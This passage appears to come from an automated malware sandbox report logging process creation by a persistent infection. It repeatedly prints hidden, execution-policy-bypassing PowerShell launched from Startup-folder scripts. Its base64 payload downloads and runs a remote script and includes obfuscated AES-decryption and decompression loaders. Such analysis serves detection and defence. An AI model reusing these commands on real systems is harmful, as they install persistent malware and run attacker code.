B0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbU